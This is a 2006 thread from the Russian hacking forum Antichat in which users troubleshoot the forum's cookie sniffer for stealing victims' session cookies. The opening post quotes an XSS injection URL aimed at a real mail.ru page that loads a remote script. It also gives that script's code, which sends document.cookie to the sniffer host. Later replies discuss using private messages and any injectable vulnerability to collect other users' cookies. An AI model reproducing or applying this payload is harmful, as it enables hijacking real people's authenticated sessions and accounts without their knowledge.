Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   проблемы с античатовским Сниффером (https://forum.antichat.xyz/showthread.php?t=21169)

Kvai 30.06.2006 20:39

проблемы с античатовским Сниффером
 
У меня вопрос про сниффер на antichat.org/s/NIK.gif
Сколько раз не пробывал использовать сниффер, но ничего не получается, то есть логи приходят, но куки в них не складывает. Пользуюсь Opera, но для проверки использовал IE. То же самое. Приходит лог с содержимым:

Код HTML:

Запрос неизвестно откуда
(30.06.2006 20:06)                 
IP: 83.237.203.238 
QUERY: 
REFERER: 
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50

Пробывал посылать закодированную прямую ссылку сниффера на почту в виде гиперссылки, пробывал использовать xss - и в уязвимом сайте вставлял скрипт:
Код HTML:

http://astral.mail.ru/numer.php?mode=9&cnum=<srcipt src="http://site.ru/xss.js"></script>
А сам скрипт выглядел так:
Код HTML:

img = new Image();  img.src = "http://antichat.org/s/NIK.gif?"+document.cookie;
К сажалению куки не приходят не с одного сайта на котором авторизованна жертва.
Если у кого есть какие идеи просьба поделиться. За ранее благодарен.
зы)
Хотел оставить мессагу в уже существующей теме: "Вопрос про сниффер" но тема уже close :(

Kvai 05.07.2006 18:38

Ну, что никто подсказать не могет. Неужели никто с этим не сталкивался? Мож все таки кто знает?

bul.666 05.07.2006 18:42

Стучи в Асечку )

Sulf aka Joker 09.07.2006 17:55

Вопрос от меня : сниффер этот работает на каких версиях форума phpbb или он только на IPB фурычит - через репорт? И можно ли послать приват мессагу комуто - если он мессагу откроет - прийдут ко мне куки его?

Ch3ck 09.07.2006 19:19

А сниффер работает "где угодно" только надо знать через какую уязвимость вставить "добрый код"... :) :cool:

Sulf aka Joker 09.07.2006 19:31

Вах вах - уже понял. Вещь - супер!


Время: 22:55